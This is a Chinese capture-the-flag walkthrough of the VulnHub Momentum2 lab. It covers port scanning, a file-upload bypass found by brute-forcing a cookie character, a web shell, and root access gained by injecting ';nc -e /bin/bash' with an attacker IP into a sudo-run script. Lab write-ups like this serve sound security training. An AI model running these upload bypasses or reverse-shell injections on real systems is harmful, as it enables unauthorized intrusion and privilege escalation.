vulnhub-Momentum2
vulnhub-Momentum2靶机
首先先去下载靶机地址:
https://download.vulnhub.com/momentum/Momentum2.ova
下载完靶机,直接利用VMave导入打开
一,信息收集
首先确定自己的靶机为net模式,知道自己靶机所在网段
然后利用kali进行IP扫描:
nmap -sP 192.168.229.0/24
发现存活的IP,除去自己的IP
发现靶机IP:192.168.229.155
如果不能扫描出IP就查看这篇博客:
https://hackergu.com/vulnhub-ip/
然后,收集靶机信息
利用:
nmap -sS -sV -T5 -A -p- 192.168.229.155
得到靶机开放的端口,22远程ssh连接端口和80端口,和操作系统
因为有80端口,所以直接访问网址:192.168.229.155
得到:
查看网页没有什么有用信息,于是就扫描后台发现存在的网址
(这里也可以利用kali自带的dirbuster,进行扫描):
发现.bak是备份文件
还有:http://192.168.229.155/dashboard.html
和:http://192.168.229.155/owls/
地址
查看一下发现:
http://192.168.229.155/dashboard.html是一个上传页面:
得到一个备份文件:
http://192.168.229.155/ajax.php.bak
还有就是目录地址:
我们先查看上传文件处是否存在文件上传漏洞:
发现不能上传一句话木马:
但上传.txt文件却成功了:
并且在http://192.168.229.155/owls/目录发现自己上传的文件:
我查看备份文件发现:
这里给出了上传文件的要求,首先要有cookie值并且为
admin=&G6u@B6uDXMq&Ms加上一位大写字母
其次是要POST一个secure的参数值为:val1d这样就返回1,表示上传
于是这里我们就利用Bp进行抓包修改:
首先添加cookie值,并添加一个要修改的地方:
在添加一个POST请求值,这里记住用自己的这
-----------------------------40911969173602388051919423628
分开POST请求的值和上传的文件的值:
然后在进行爆破admin最后的大写字母,这里就用bp自带的大写字母
爆破:
得到为R时上传成功
查看shell是否在目录:
发现成功上传,访问shell得到:
请求一个参数试试:
成功执行命令,于是直接上蚁剑连接得到:
查找有用信息得到第一个flag:
并发现一个密码:
但不完全myvulnerableapp[Asterisk]中[Asterisk]表示‘ * ’号
于是就猜测账户:athena,密码:myvulnerableapp*
测试一下:
发现成功登陆,然后查看一下权限一下发现:
可以无密码运行cookie-gen.py文件
查看一下cookie-gen.py文件:
发现是一个脚本,运行后会要输入seed的值,这个值会echo到log.txt文件中,并且会执行bash命令,可以直接反弹shell
然后我们就利用nc监听
nc-使用方法就不在缀诉
直接在kali上用:nc -lvvp 6666
监听
然后在靶机运行cookie-gen.py:
sudo python3 /home/team-tasks/cookie-gen.py
得到:
在输入监听的机器:
;nc -e /bin/bash 192.168.229.153 6666
在回到监听的机器,就可以发现提权完成,得到flag:
vulnhub-Momentum2相关推荐
- [Vulnhub]Momentum2
信息搜集 1.netdiscover 扫了半天扫不到,后来dl告诉说虚拟机配置有问题,参考 https://blog.csdn.net/qq_45290991/article/details/1141 ...
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
- 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...
最新文章
- PHPWAMP集成环境Zend组件的相关介绍,环境默认的PHP运行模式
- SAP PP ECR的Profile规定了用它可以修改哪些数据对象
- dnsmasq搭建简易DNS服务器
- 基于php构建APi流程,php – 如何构建一个RESTful API?
- cura-engine学习(1)
- 人工智障学习笔记——机器学习(1)特征工程
- 微信公众平台开发--判断终端使用的浏览器是否是微信浏览器
- pg 事务 存储过程_PgpoolII实现数据分区存储及性能分析
- python二分法查找数字_Python——二分法查找
- python最基本的语句_Python的基本语句
- [Twisted] Protocols协议和Protocol Factories 协议工厂
- android okhttputils传数组,okhttp传递数组参数
- 取消开机就弹出 msn中文网 操作步骤
- cad编程c语言,基于C.NET的AutoCAD二次开发简版.pdf
- 硕士论文查重和本科论文查重的差别在哪里?
- Linux-Ubuntu系统配置深度学习环境搭建
- Flutter中的widget
- 关于CNN中感受野的理解和计算方法
- linux内核源码分析之proc文件系统(二)
- 【Visual C++】游戏开发四十八 浅墨DirectX教程十六 三维地形系统的实现
热门文章
- BUU-2019极客大挑战全集
- 致敬经典:Ball and Brown (1968)
- GG-CNN代码学习
- openNI驱动控制kinect马达
- 《数据库系统原理》第一遍思维导图
- cordova语音通话_如何在Cordova中将文本转换为语音(语音合成)
- adb: error: failed to copy ‘xx‘ to ‘xx‘: remote couldn‘t create file: Permission denied
- 【知识图谱】实践篇——基于医疗知识图谱的问答系统实践(Part1):项目介绍与环境准备
- 纯c语言编译器pelloc,大规模并行粒子模拟系统代码级优化研究和实现.pdf
- 2003-2019年各省数据GDP、人均GDP、城镇化率、年末人口数、人口自然增长率